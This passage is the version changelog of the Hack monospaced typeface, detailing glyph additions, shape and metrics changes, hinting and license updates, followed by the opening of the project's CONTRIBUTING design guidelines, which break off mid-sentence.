(upper case U breve), regular set - Issue #21 - added U+016D (lower case u breve), regular set - Issue #21 # Version 2.017 (release build) ttf, otf, webfont builds Changes vs. release v2.015: - increased vertical position of the tilde (U+007E) to improve alignment with other glyphs - Issue #23 - increased width of the vertical stroke on the dollar symbol (U+0024) - Issue #92 - modified Cyrillic upper case C (U+0421) to differentiate from Latin C - Issues #22 & #29 - modified Cyrillic lower case c (U+0441) to differentiate from Latin c - Issues #22 & #29 - modified upper case theta (U+0398) to differentiate from lower case theta - Issue #36 - added U+0132 (IJ) glyph - Issue #52 - added U+0133 (ij) glyph - Issue #52 - added U+013F (upper case L dot) glyph - Issue #52 - added U+0140 (lower case l dot) glyph - Issue #52 - added U+0162 (upper case T cedilla) glyph - Issue #52 - added U+0163 (lower case t cedilla) glyph - Issue #52 - added U+0138 (kgreenlandic) glyph - Issue #52 - added U+266A (musical note) glyph - Issue #52 - added U+0149 (lower case n apostrophe) - Issue #52 - added U+1EF9 (lower case y tilde) glyph - Issue #102 - added U+1EF8 (upper case Y tilde) glyph - Issue #102 - added U+1EBD (lower case e tilde) glyph - Issue #102 - added U+1EBC (upper case E tilde) glyph - Issue #102 - added U+2116 (numero) glyph - Issues #22 & #114 - added U+01A4 (p hook) glyph - Issue #105 - added U+0108 (upper case C circumflex) - Issue #21 - added U+0109 (lower case c circumflex) - Issue #21 - added U+011C (upper case G circumflex) - Issue #21 - added U+011D (lower case g circumflex) - Issue #21 - added U+0124 (upper case H circumflex) - Issue #21 - added U+0125 (lower case h circumflex) - Issue #21 - added U+0134 (upper case J circumflex) - Issue #21 - added U+0135 (lower case j circumflex) - Issue #21 - added U+015C (upper case S circumflex) - Issue #21 - added U+015D (lower case s circumflex) - Issue #21 - added U+016C (upper case U breve) - Issue #21 - added U+016D (lower case u breve) - Issue #21 - added U+20B7 (spesmilo) - Issue #21 - fixed missing null glyph (U+0000) in regular, italic, bolditalic sets - removed duplicate CR glyph (U+000D) in all sets - Issue #149 - updated ttfautohint to version 1.4.1 for TrueType (.ttf) build instruction sets # Version 2.016 (testing build) - increased vertical position of the tilde (U+007E) to improve alignment with other glyphs - Issue #23 - increased width of the vertical stroke on the dollar symbol (U+0024) - Issue #92 - modified Cyrillic upper case C (U+0421) to differentiate from Latin C - Issues #22 & #29 - modified Cyrillic lower case c (U+0441) to differentiate from Latin c - Issues #22 & #29 - modified upper case theta (U+0398) to differentiate from lower case theta - Issue #36 - added U+1EF9 (lower case y tilde) glyph - Issue #102 - added U+1EF8 (upper case Y tilde) glyph - Issue #102 - added U+1EBD (lower case e tilde) glyph - Issue #102 - added U+1EBC (upper case E tilde) glyph - Issue #102 - added U+2116 (numero) glyph - Issues #22 & #114 - added U+01A4 (p hook) glyph - Issue #105 - added U+0108 (upper case C circumflex) - Issue #21 - added U+0109 (lower case c circumflex) - Issue #21 - added U+011C (upper case G circumflex) - Issue #21 - added U+011D (lower case g circumflex) - Issue #21 - added U+0124 (upper case H circumflex) - Issue #21 - added U+0125 (lower case h circumflex) - Issue #21 - added U+0134 (upper case J circumflex) - Issue #21 - added U+0135 (lower case j circumflex) - Issue #21 - added U+015C (upper case S circumflex) - Issue #21 - added U+015D (lower case s circumflex) - Issue #21 - added U+016C (upper case U breve) - Issue #21 - added U+016D (lower case u breve) - Issue #21 - added U+20B7 (spesmilo) - Issue #21 - updated ttfautohint to version 1.4 for TrueType (.ttf) build instruction sets # Version 2.015 (release build) ttf, otf, webfont builds Changes vs. release v2.013: - new vertical metrics = decreased line spacing height - Issues #28, #32, #39, #41, #95, #103 - adjusted vertical position of the colon to a higher position, improves alignment with other punctuation glyphs (U+003A) - Issue #66 - changed vertical position of the dash (U+002D) so that regular and oblique, bold and bold oblique are properly aligned - Issue #107 - updated hinting algorithm for bold set (improved point position over stem of lowercase j/i for some text sizes) - Issue #84 - underscore (U+005F) centered, increased width, increased height & aligned vertical position closer to baseline - Issues #97, #98, #100, 103, - increased vertical position of dieresis mark on lowercase u dieresis (U+00FC) - Issue #61 - increased vertical position of dieresis mark on lowercase i dieresis (U+00EF) - increased vertical position of dieresis mark on lowercase e dieresis (U+00EB) - decreased vertical position of the asterisk (U+002A) - Issue #34 - new design for ascii tilde - broader curves, taller glyph with goal to improve appearance at small text sizes where it tended to render like a dash (U+007E) - Issue #37 - new ttf build autohinting script (./postbuild_processing/tt-hinting/autohint.sh) - new ttf build autohinting Control Instructions File - bold set (./postbuild_processing/tt-hinting/Hack-Bold-TA.txt) - new ttf build release script (./postbuild_processing/tt-hinting/release.sh) - new web font release script (./postbuild_processing/webfonts/releasewebfonts.sh) - new vfb to UFO source file conversion script (./tools/makeufo.sh) - new UFO source file types - includes separate source files for TrueType (`*-TT.ufo`) and PostScript (`*-PS.ufo`) releases - source file path changes: now includes separate `ufo` and `vfb` directories under the `./source` repository directory - Hack Open Font license updated to version 2.0. The license changes better define the Hack project as a derivative project of the Bitstream Vera Sans Mono typeface project and are intended to make the license more consistent with the Bitstream Vera libre, open source license under which Hack is co-licensed. There are no new restrictions on use of the fonts with these license changes. Embedding permissions are made explicit in this version of the Hack Open Font license. # Version 2.014 (testing build) - ttf only build for testing - updated hinting algorithm for bold set (corrected incorrect point position of lowercase j/i at some sizes) - Issue #84 - adjusted vertical metrics - Issues #28, #32, #39, #41, #95, #103 - centered, increased width, & adjusted vertical position of underscore - Issues #97, #98, #100, 103, - increased vertical position of dieresis mark on lowercase u dieresis (U+00FC) - Issue #61 - increased vertical position of dieresis mark on lowercase i dieresis (U+00EF) - increased vertical position of dieresis mark on lowercase e dieresis (U+00EB) - decreased vertical position of the asterisk (U+002A) - Issue #34 - new design for ascii tilde (U+007E) - Issue #37 # Version 2.013 (release build) ttf, otf, webfont builds Changes vs. release v2.010 - Fixed missing middle dot glyph (U+00B7), adjusted width of U+00B7 em box to address spacing issues in editors that highlight empty spaces (Issues #27 & 46) - Powerline glyph alignment and size adjustments (Issue #33) - Fixed name tables to address: - incorrect oblique rendering with Java type renderers on OS X (Issue #26) - incorrect italic + bold + bold oblique rendering in some syntax highlighters (Issues #42, #50, #60) - backslash character took inappropriate vertical alignment because of incorrect slant angle in some editors (Issue #67) - Changed oblique and bold oblique font names to "Hack Italic" and "Hack Bold Italic" to address Windows listings - Changed oblique and bold oblique webfont names to "hack-italic-webfont.[xxx]" and "hack-bolditalic-webfont.[xxx]" - Changed oblique and bold oblique basic Latin + Latin-1 webfont subsets to the names "hack-italic-latin-webfont.[xxx]" and "hack-bolditalic-latin-webfont.[xxx]" - Changed license name from "Modified SIL Open Font License" to "Hack Open Font License" to comply with SIL regulations for SIL Open Font License modifications - Removed all license references to SIL to comply with SIL regulations for modifications of the SIL Open Font License - Removed SIL Open Font License preamble from the Hack Open Font License to comply with SIL regulations for modifications of the SIL Open Font License - Removed the following statement from Hack Open Font License condition #3: "This restriction only applies to the primary font name as presented to the users." to address a reserved font name conflict with the Bitstream Vera license - Modified the build directory structure for the Hack web fonts - Added Hack webfont CSS files to the build directory # Version 2.012 (testing build) - ttf only build for testing - Powerline glyph alignment and size adjustments (Issue #33) - Fixed name tables to address: - incorrect oblique rendering with Java type renderers on OS X (Issue #26) - incorrect italic + bold + bold oblique rendering in some syntax highlighters (Issues #42, #50, #60) - backslash character took inappropriate vertical alignment because of incorrect slant angle in some editors (Issue #67) # Version 2.011 (testing build) - ttf only build for testing - fixed missing middle dot glyph (U+00B7), adjusted width of U+00B7 em box to address spacing issues in editors that highlight empty spaces (Issues 27 & 46) # Version 2.010 ### New Glyphs - New glyphs for Revised Western European (ISO-8859-15, Latin-9) character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Central European (ISO-8859-2, Latin-2) character set (shapes from DejaVu Sans Mono typeface) - New glyphs for South European (ISO-8859-3, Latin-3) character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Vietnamese character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Pan African Latin character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Cyrillic (ISO-8859-5) character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Greek (ISO-8859-7) character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Armenian character set (shapes from DejaVu Sans Mono typeface) - New glyphs for Georgian character set (shapes from DejaVu Sans Mono typeface) - New punctuation glyphs - New Powerline glyphs - New number glyphs - New scientific inferior numerals - New superscript numerals - New subscript numerals - New symbol glyphs - New **dotlessi** - New **iacute** - New **icircumflex** - New **idieresis** - New **igrave** - New **imacron** - New **iogonek** - New **itilde** - New **uppercase upsilon** - New **uppercase upsilon tonos** - New uni0069 - New uni0457 - New uni0458 ### Modified Glyphs ##### Latin Character Set - Modified **uppercase Q** - added flared tail and modified tail angle - Modified **uppercase F** - central arm lowered to fill open gap at the base - Modified **lowercase a** - added curved tail/spur - Modified **lowercase b** - decreased width of terminal, opened angle - Modified **lowercase d** - decreased width of terminal, opened angle - Modified **lowercase g** - decreased width of terminal, opened angle - Modified **lowercase i** - rounded corners of the dot, oriented dot position left of center relative to vertical stem, adjusted vertical position of the horizontal stem to x-height, lengthened the vertical stem to slightly overshoot baseline with the curved tail, decreased width of horizontal stem - Modified **lowercase j** - rounded corners of the dot, oriented dot position left of center relative to vertical stem - Modified **lowercase l** - lengthened the vertical stem to overshoot the baseline with the curved tail - Modified **lowercase m** - decreased width of terminal, opened angle - Modified **lowercase n** - decreased width of terminal, opened angle - Modified **lowercase p** - decreased width of terminal, opened angle - Modified **lowercase q** - decreased width of terminal, opened angle - Modified **lowercase r** - decreased width of terminal, opened angle - Modified **lowercase t** - added angle to the upper terminal, increased length of the vertical stem to allow the curved tail to slightly overshoot the baseline - Modified **lowercase y** - modified curves - Modified **0** - modified width and length of central oval fill, improved symmetry of the oval fill in all sets - Modified **2** - rounded the upper left corner of the base, decreased width of the spine of the hook - Modified **Abreve** - modified curves - Modified **Aogonek** - modified curve, decreased the width of the tail to meet typeface metrics - Modified **Eogonek** - modified tail curve - Modified **Iogonek** - modified tail curve - Modified **Itilde** - modified tilde curve - Modified **Ohorn** - modified horn curve - Modified **Oslash** - modified curves - Modified **Oslashacute** - modified curves - Modified **Otilde** - modified tilde curve - Modified **Racute** - modified bowl and leg curves - Modified **Rcaron** - modiifed bowl and leg curves - Modified **Rcommaaccent** - modified bowl and leg curves - Modified **Scommaaccent** - modified curves - Modified **Tcommaaccent** - modified comma accent curves - Modified **Ucircumflex** - modified curves - Modified **Udieresis** - modified curves - Modified **Ugrave** - modified curves - Modified **Uhorn** - modified curves - Modified **Uhungarumlaut** - modified curves - Modified **Umacron** - modified curves - Modified **Uogonek** - modified curves - Modified **Uring** - modified curves - Modified **Utilde** - modified curves - Modified **agrave** - decreased width of terminal, opened angle in regular and bold sets - Modified **aacute** - decreased width of terminal, opened angle in regular and bold sets - Modified **abreve** - decreased width of upper terminal to create an angled stem - Modified **acircumflex** - decreased width of terminal, opened angle - Modified **atilde** - decreased width of terminal, opened angle - Modified **adieresis** - decreased width of terminal, opened angle - Modified **amacron** - decreased width of upper terminal to create an angled stem - Modified **aring** - decreased width of terminal, opened angle - Modified **dcroat** - decreased width of terminal, opened angle - Modified **dcaron** - decreased width of lower terminal to create angled stem - Modified **ecaron** - modified curves - Modified **ecircumflex** - modified curves - Modified **edieresis** - modified curves - Modified **egrave** - modified curves - Modified **emacron** - modified curves - Modified **eogonek** - modified curves - Modified **gbreve** - modified curves of bowl and tail - Modified **gcaron** - modified curves of bowl and tail, decreased width of upper terminal to create angled stem - Modified **gcommaaccent** - modified curves of bowl and tail, decreased width of upper terminal to create angled stem - Modified **gdotaccent** - modified curves of bowl and tail, decreased width of upper terminal to create angled stem - Modified **hbar** - adjusted curves - Modified **dotlessi** - decreased width of horizontal stem - Modified **iacute** - decreased width of horizontal stem - Modified **icircumflex** - decreased width of horizontal stem - Modified **idieresis** - decreased width of horizontal stem - Modified **igrave** - decreased width of horizontal stem - Modified **imacron** - decreased width of horizontal stem - Modified **iogonek** - decreased width of horizontal stem - Modified **itilde** -decreased width of horizontal stem - Modified **nacute** - adjusted curves - Modified **ncaron** - adjusted curves - Modified **ncommaaccent** - adjusted curves - Modified **eng** - adjusted curves, decreased the upper terminal width to create an angled stem - Modified **nacute** - decreased width of upper terminal to create angled stem - Modified **ncaron** - decreased width of upper terminal to create angled stem - Modified **ncommaaccent** - decreased width of upper terminal to create angled stem - Modified **ntilde** - adjusted curves - Modified **ohorn** - adjusted curves - Modified **ohungarumlaut** - adjusted curves - Modified **omacron** - adjusted curves - Modified **oslash** - adjusted curves - Modified **oslashacute** - adjusted curves - Modified **otilde** - adjusted curves - Modified **racute** - adjusted curves, decreased width of upper terminal to create angled stem - Modified **rcaron** - adjusted curves, decreased width of upper terminal to create angled stem - Modified **rcommaaccent** - adjusted curves, decreased width of upper terminal to create angled stem - Modified **sacute** - adjusted curves - Modified **scedila** - adjusted curves - Modified **scommaaccent** - adjusted curves - Modified **lowercase t** - decreased length of the left terminal to angle the horizontal stem - Modified **tbar** - decreased length of the left terminal to angle the horizontal stem - Modified **tcaron** - decreased length of the left terminal to angle the horizontal stem - Modified **tcommaaccent** - adjusted curves, decreased length of the left terminal to angle the horizontal stem - Modified **uhorn** - adjusted curves, decreased width of lower terminal to create angled stem - Modified **uhungarumlaut** - adjusted curves, decreased width of lower terminal to create angled stem - Modified **umacron** - adjusted curves, decreased width of lower terminal to create angled stem - Modified **uogonek** - adjusted curves, decreased width of lower terminal to create angled stem - Modified **uring** - adjusted curves, decreased width of lower terminal to create angled stem - Modified **utilde** - adjusted curves, decreased width of lower terminal to create angled stem - Modified **yacute** - adjusted curves - Modified **ycircumflex** - adjusted curves - Modified **ydieresis** - adjusted curves - Modified **ygrave** - adjusted curves - Modified **zdotaccent** - rounded corners of dot - Modified **gbreve** - decreased width of terminal, opened angle in regular and bold sets - Modified **ntilde** - decreased width of terminal, opened angle in regular and bold sets - Modified **ugrave** - decreased width of terminal, opened angle in regular and bold sets - Modified **uacute** - decreased width of terminal, opened angle in regular and bold sets - Modified **ucircumflex** - decreased width of terminal, opened angle in regular and bold sets - Modified **udieresis** - decreased width of terminal, opened angle in regular and bold sets - Modified **exclamdown** - rounded corners of the dot - Modified **dieresis** - rounded corners - Modified **questionmarkdown** - rounded corners of the dot - Modified **ordfeminine** - decreased width of lower terminal on the a character to create angled stem - Modified **Adieresis** - rounded corners of dieresis component of glyph - Modified **Edieresis** - rounded corners of dieresis component of glyph - Modified **Idieresis** - rounded corners of dieresis component of glyph - Modified **Odieresis** - rounded corners of dieresis component of glyph - Modified **Udieresis** - rounded corners of dieresis component of glyph - Modified **Ydieresis** - rounded corners of dieresis component of glyph - Modified **adieresis** - rounded corners of dieresis component of glyph - Modified **edieresis** - rounded corners of dieresis component of glyph - Modified **idieresis** - rounded corners of dieresis component of glyph - Modified **odieresis** - rounded corners of dieresis component of glyph - Modified **udieresis** - rounded corners of dieresis component of glyph - Modified **ydieresis** - rounded corners of dieresis component of glyph - Modified **Idotaccent** - rounded corners of the dot - Modified **dotaccent** - rounded corners of the dot - Modified **ellipsis** - rounded corners of the dots - Modified **periodcentered** - rounded corners of the dot ##### Greek Character Set - Modified **upsilondieresistonos** - adjusted vertical position to properly position on the baseline - Modified **iotadieresistonos** - adjusted vertical position to properly position on the baseline - Modified **eth** - altered curve of the neck - Modified **uppercase eta** - modified the curves - Modified **uppercase theta** - modified the curves - Modified **uppercase omicron** - modified the curves - Modified **uppercase rho** - modified the curves - Modified **uppercase psi** - modified the curves - Modified **uppercase upsilon** - new glyph style (change from Latin Y shape) - Modified **uppercase omega** - modified the curves - Modified **uppercase alphatonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase epsilontonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase etatonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase iotatonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase omicrontonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase upsilontonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase omegatonos** - adjusted right and left sidebearings, corrected position of the tonos symbol - Modified **uppercase iotadieresis** - rounded the dieresis points - Modified **uppercase upsilondieresis** - new upsilon shape, rounded the dieresis points - Modified **lowercase alpha** - adjusted curves - Modified **lowercase beta** - adjusted curves - Modified **lowercase gamma** - adjusted curves - Modified **lowercase delta** - adjusted curves - Modified **lowercase epsilon** - adjusted curves - Modified **lowercase zeta** - adjusted curves - Modified **lowercase eta** - decreased width of the top terminal to create angled stem, adjusted curves - Modified **lowercase theta** - adjusted curves - Modified **lowercase iota** - adjusted curves - Modified **lowercase lambda** - adjusted curves - Modified **lowercase mu** - adjusted curves - Modified **lowercase nu** - adjusted curves - Modified **lowercase xi** - adjusted curves - Modified **lowercase omicron** - adjusted curves - Modified **lowercase pi** - adjusted curves - Modified **lowercase rho** - adjusted curves - Modified **lowercase sigmafinal** - adjusted curves - Modified **lowercase sigma** - adjusted curves - Modified **lowercase tau** - adjusted curves - Modified **lowercase upsilon** - adjusted curves - Modified **lowercase phi** - adjusted curves - Modified **lowercase chi** - adjusted curves - Modified **lowercase psi** - adjusted curves - Modified **lowercase omega** - adjusted curves - Modified **lowercase iotatonos** - adjusted curves - Modified **lowercase iotadieresis** - rounded points of the dieresis, adjusted curves - Modified **iotadieresistonos** - rounded corners of points of dieresis mark, appropriately positioned tonos mark, adjusted curves - Modified **lowercase upsilontonos** - adjusted curves - Modified **lowercase upsilondieresis** - rounded points of dieresis mark, adjusted curves - Modified **upsilondieresistonos** - rounded corners of points of dieresis mark, appropriately positioned tonos mark, adjusted curves - Modified **lowercase omicrontonos** - adjusted curves - Modified **lowercase omegatonos** - adjusted curves - Modified **lowercase alphatonos** - adjusted curves - Modified **lowercase epsilontonos** - adjusted curves - Modified **lowercase etatonos** - decreased width of top terminal to create angled stem, adjusted curves ##### Cyrillic Character Set - Modified curves in uni0411, uni0412, uni0401, uni0417, uni041B, uni041E, uni0420, uni0421, uni0423, uni040E, uni0424, uni0427, uni042F, uni042C, uni042A, uni042B, uni0409, uni040A, uni0405, uni0404, uni042D, uni0408, uni040B, uni042E, uni0402, uni0462, uni0472, uni0494, uni0498, uni04AA, uni04BA, uni04CB, uni04D0, uni04D2, uni04D6, uni04D8, uni04DA, uni04DC, uni04DE, uni04E0, uni04E4, uni04E6, uni04E8, uni04EA, uni04EC, uni04EE, uni04F0, uni04F2, uni04F4, uni04F8, uni0510, uni051A, uni0430, uni0431, uni0432, uni0434, uni0435, uni0450, uni0451, uni0437, uni0439, uni043B, uni043E, uni0440, uni0441, uni0443, uni045E, uni0444, uni0447, uni044F, uni044C, uni044A, uni044B, uni0459, uni045A, uni0455, uni0454, uni044D, uni0456, uni0457, uni0458, uni045B, uni044E, uni0452, uni0463, uni0473, uni0499, uni04AB, uni04BB, uni04CC, uni04D1, uni04D3, uni04D7, uni04D9, uni04DB, uni04DD, uni04DF, uni04E1, uni04E5, uni04E7, uni04E9, uni04EB, uni04ED, uni04EF, uni04F1, uni04F3, uni04F5, uni04F9, uni0511, uni051B, uni04D5 - Rounded corners of points of dieresis marks in uni0401, uni0407, uni04D2, uni04DA, uni04DC, uni04DE, uni04E4, uni04E6, uni04EA, uni04EC, uni04F0, uni04F4, uni04F8, uni0451, uni0457, uni04D3, uni04DB, uni04DD, uni04DF, uni04E5, uni04E7, uni04EB, uni04ED, uni04F1, uni04F5, uni04F9 - Rounded corners of dots in uni0456, uni0458 - Modified **lowercase i** glyphs (uni0456, uni0457) so that they are consistent with the shape of the Hack Latin lowercase i - Modified **uni0430** - decreased width of lower terminal to create angle - Modified **uni0440** - decreased width of upper terminal to create angle - Modified **uni04D1** - decreased width of lower terminal to create angle - Modified **uni04D3** - decreased width of lower terminal to create angle - Modified **uni051B** - decreased width of upper terminal to create angle - Numerous metrics changes to better align the Cyrillic glyphs in a fixed width format ##### Armenian Character Set - Modified curves in uni0531, uni0532, uni0533, uni0534, uni0535, uni0536, uni0538, uni0539, uni053A, uni053B, uni053D, uni053E, uni053F, uni0540, uni0541, uni0542, uni0543, uni0544, uni0545, uni0546, uni0547, uni0548, uni0549, uni054A, uni054B, uni054C, uni054D, uni054E, uni054F, uni0550, uni0551, uni0553, uni0554, uni0555, uni0556, uni0561, uni0562, uni0563, uni0564, uni0565, uni0566, uni0568, uni0569, uni056A, uni056B, uni056D, uni056E, uni056F, uni0570, uni0571, uni0572, uni0573, uni0574, uni0575, uni0576, uni0577, uni0578, uni0579, uni057A, uni057B, uni057C, uni057D, uni057E, uni057F, uni0580, uni0581, uni0583, uni0584, uni0585, uni0586, uni0587 - Modified **uni0563** - decreased width of the upper terminal to create angle - Modified **uni0564** - decreased width of the upper terminal to create angle - Modified **uni0566** - decreased width of the upper terminal to create angle - Modified **uni0568** - decreased width of the upper terminal to create angle - Modified **uni0569** - decreased width of the upper terminal to create angle - Modified **uni0572** - decreased width of the upper terminal to create angle - Modified **uni0573** - decreased width of the upper terminal to create angle - Modified **uni0574** - decreased width of the upper terminal to create angle - Modified **uni0576** - decreased width of the upper terminal to create angle - Modified **uni0578** - decreased width of the upper terminal to create angle - Modified **uni057C** - decreased width of the upper terminal to create angle - Modified **uni057D** - decreased width of the upper terminal to create angle - Modified **uni0580** - decreased width of the upper terminal to create angle - Modified **uni0581** - decreased width of the upper terminal to create angle - Modified **uni0584** - decreased width of the upper terminal to create angle ##### Georgian Character Set - Modified curves in uni10D0, uni10D1, uni10D2, uni10D3, uni10D4, uni10D5, uni10D6, uni10D7, uni10D8, uni10D9, uni10DA, uni10DB, uni10DC, uni10DD, uni10DE, uni10DF, uni10E0, uni10E1, uni10E2, uni10E3, uni10E4, uni10E5, uni10E6, uni10E7, uni10E8, uni10E9, uni10EA, uni10EB, uni10EC, uni10ED, uni10EE, uni10EF, uni10F0, uni10F1, uni10F2, uni10F3, uni10F4, uni10F5, uni10F6, uni10F7, uni10F8, uni10F9, uni10FA, uni10FC, uni055C, uni055E - Rounded corners of points in uni10FB, uni0589 ##### Punctuation Character Set - Modified curves in uni2047, questiondown, uni203D, uni203F, uni2048, uni2049, uni204B, uni2E18, uni2E1F, uni2E2E, uni2E18.case, questiondown.case, uni208E, uni207E, uni2768, uni2769, uni276B, uni27C5, uni27C6, uni2987, uni2988, uni055C, uni055E, uni061F, H18533, circle, uni25EF, uni25D0, uni25D1, uni25D2, uni25D3, uni25D6, uni25D7, uni25D4, uni25D5, uni25F4, uni25F5, uni25F6, uni25F7, uni25CD, uni25C9, uni25CE, openbullet, invbullet, invcircle, uni25DA, uni25DB, uni25E0, uni25E1, uni25DC, uni25DD, uni25DE, uni25DF, ampersand, copyright, registered, section, degree - Modified **dong** - decreased width of the lower terminal to create an angled stem - Modified **uni20A5** - decreased width of the upper terminal to create an angled stem - Modified **uni225D** - decreased width of the lower terminal on the d character to create an angled stem - Modified **uni225E** - decreased width of the upper terminal to create an angled stem ##### Symbol Character Set - Modified curves in cent, colonmonetary, dong, euro, florin, lira, peseta, sterling, uni0E3F, uni20A0, uni20A2, uni20A5, uni20A8, uni20AA, uni20AF, uni20B0, uni20B1, uni20B2, uni20B4, uni20B5, uni20B9, approxequal, asciitilde, circlemultiply, circleplus, congruent, element, emptyset, infinity, integral, integralbt, integraltp, intersection, notelement, notsubset, partialdiff, percent, perthousand, propersubset, propersuperset, proportional, reflexsubset, reflexsuperset, similar, suchthat, therefore, uni2031, uni2126, uni2201, uni220A, uni220C, uni220D, uni2218, uni221B, uni222C, uni222D, uni2235, uni2236, uni2237, uni2238, uni2239, uni223A, uni223B, uni223D, uni2241, uni2242, uni2243, uni2244, uni2246, uni2247, uni2249, uni224A, uni224B, uni224C, uni224E, uni224F, uni2250, uni2251, uni2252, uni2253, uni2254, uni2255, uni2256, uni2257, uni2258, uni225D, uni225E, uni225F, uni2272, uni2273, uni2274, uni2275, uni227C, uni227D, uni227E, uni227F, uni2285, uni2288, uni2289, uni228B, uni228D, uni2296, uni2298, uni2299, uni229A, uni229B, uni229C, uni229D, uni22B8, uni22CD, uni22D0, uni22D1, uni22DE, uni22DF, uni22E0, uni22E1, uni22E6, uni22E7, uni22E8, uni22E9, uni22EF, uni23A8, uni23AC, uni27DC, uni2A00, uni2A6A, uni2A6B, union, uni219C, uni219D, uni21AD, uni21A9, uni21AA, uni21AB, uni21AC, uni21B6, uni21B7, uni21BA, uni21BB, uni21F4, H18533, circle, uni25EF, uni25D0, uni25D1, uni25D2, uni25D3, uni25D6, uni25D7, uni25D4, uni25D5, uni25F4, uni25F5, uni25F6, uni25F7, uni25CD, uni25C9, uni25CE, openbullet, invbullet, invcircle, uni25DA, uni25DB, uni25E0, uni25E1, uni25DC, uni25DD, uni25DE, uni25DF, at, ampersand, copyright, registered, section, degree, uni0606, uni03F6 ### Metrics Changes - Changed line gap / typo line gap to 275 units - Modified **uppercase P** - increased right sidebearing to equal sidebearing of uppercase O glyph - Modified **uppercase Z** - changed to right = left sidebearing (shifts orientation to left) for regular, bold, oblique sets - Modified **uppercase Z** - reduced left sidebearing for bold oblique set, not necessary to make this equal as with above sets - Modified **lowercase a** - reduced left sidebearing - Modified **lowercase c** - reduced left sidebearing - Modified **lowercase e** - increased left sidebearing - Modified **lowercase g** - increased left sidebearing - Modified **lowercase i** - increased left sidebearing - Modified **lowercase j** - increased left sidebearing - Modified **lowercase k** - reduced left sidebearing - Modified **lowercase r** - reduced left sidebearing - Modified **3** - increased left sidebearing - Modified **Zacute** - centered glyph (reduced left sidebearing, increased right sidebearing) - Modified **Zcaron** - centered glyph (reduced left sidebearing, increased right sidebearing) - Modified **Zdotaccent** - centered glyph (reduced left sidebearing, increased right sidebearing) - Modified **aacute** - increased left sidebearing - Modified **abreve** - increased left sidebearing - Modified **acircumflex** - increased left sidebearing - Modified **adieresis** - increased left sidebearing - Modified **agrave** - increased left sidebearing - Modified **amacron** - increased left sidebearing - Modified **aogonek** - increased left sidebearing - Modified **aring** - increased left sidebearing - Modified **atilde** - increased left sidebearing - Modified **kcommaaccent** - decreased left sidebearing - Modified **racute** - decreased left sidebearing - Modified **rcaron** - decreased left sidebearing - Modified **rcommaaccent** - decreased left sidebearing - Mofified **Mu** - increased left sidebearing - Modified **Zeta** - reduced left sidebearing to center the glyph - Modified **Rho** - reduced left sidebearing - Modified **Phi** - increased left sidebearing - Modified **left guillemet** - increased right sidebearing - Modified **right guillemet** - increased left sidebearing - Modified **left brace** - increased right sidebearing - Modified **right brace** - increased left sidebearing - Modified **left bracket** - increased right sidebearing - Modified **right bracket** - increased left sidebearing - Modified **left parenthesis** - increased right sidebearing - Modified **right parenthesis** - increased left sidebearing - Adjusted spacing on all diacritic marks in the regular, bold, oblique, and bold oblique set ### True Type Instructions / PostScript Hinting - New TrueType instructions / PostScript hinting across the entire glyph set ### Removed - Removed **fi** and **fl** ligatures. Spacing issues that require these ligatures are not present in this monospaced typeface # Version 1.3 ### Modified Glyphs - Curve adjustments & curve smoothing across all glyphs in the font collection - hinting improvements ### Build Files - New binary build system - should result in improved cross-platform compatibility for font binaries # Version 1.2 ### Modified Glyphs - Modified **lowercase i** glyph. Removed serif and added curved tail - Modified **hyphen** glyph. Widened - Modified **zero** glyph. Adjusted alignment and shape of the oval fill - Modified **left parenthesis** glyph. Increased right sidebearing length - Modified **right parenthesis** glyph. Increased left sidebearing length ### Source - Converted to UFO formatted source # Version 1.0.1 - Modified the SIL license to permit dual licensing with the Bitstream Vera license. This modification removed the stipulation that multiple licenses are not possible (preamble and section #5) and was intended to create the new Reserved Font Name Hack for this typeface modification and preserve the right (for myself and others) to define Reserved Font Names for all future fonts derived from this typeface. There are no other modifications to either license under which this font is released. - This release did not introduce changes to the glyphs included in the typeface # Version 1.0.0 - Branched Bitstream Vera Sans Mono 1.10 release ## Changes ### New Glyphs - New **exclamation point** glyph. Circular full stop point, tapered line, increased weight relative to other characters. - New **asterisk** glyph. Glyph shape from Source Code Pro. Modified vertical position of the glyph to orient closer to the ascender. - New **period** glyph. Circular full stop point, modified from square glyph. - New **comma** glyph. Rounded comma shape from Source Code Pro, modified from square glyph. - New **colon** glyph. Circular colon points, modified from square points. - New **semicolon** glyph. Circular point and rounded comma shape from Source Code Pro, increased vertical spacing between the shapes ### Modified Glyphs - Modified **percent** glyph. Increased line length and added vertical line ends. - Modified **zero** glyph. Changed circular fill to oval fill. - Modified **left square bracket** glyph. Increased height of the glyph. - Modified **right square bracket** glyph. Increased height of the glyph. - Modified **left curly bracket** glyph. Modified vertical position, increased length of the horizontal stem, decreased left sidebearing - Modified **right curly bracket** glyph. Modified vertical position, increased length of the horizontal stem, decreased right sidebearing - Modified **question mark** glyph. Changed square full stop point to circular full stop point. - Modified **hyphen** glyph. Raised vertical alignment to center `->` character combinations. ### Font Styles - **Regular** - includes all changes indicated above - **Regular Oblique** - includes all changes indicated above - **Bold** - includes all changes indicated above - **Bold Oblique** - includes all changes indicated above
Markdown
Hack/CONTRIBUTING.md
# Hack Typeface Design Hack is a monospaced typeface that is designed to optimize the display of source code text. This document outlines the core ideas on which we build to continually improve Hack. Ideally, they serve as a final rationale to decide disputes of whatever nature. Design is a highly subjective and opinionated topic. Being a collaborative effort, we prefer to focus on the discussion about a change, rather than the final product of a change. In practical terms this means that for any substantial amount of work, we'd like to see an Issue Report or Pull Request which presents an idea or the approach for a change. By keeping the discussion open, not only will you get community feedback, it also allows us to judge your contribution on more than the final product. ## Design Targets Hack is a general purpose typeface for source code. The _needs of the many_ describe our core design targets. Generally, an issue that affects a majority of users receives higher priority than an issue that affects a minority of users. ### Core - **ASCII glyph set**; generally speaking, all source code is limited to the ASCII set. Content/comments/documentation, on the other hand, often includes non-ASCII characters. The former gets precedence over the latter. - We focus on an accepted **single glyph 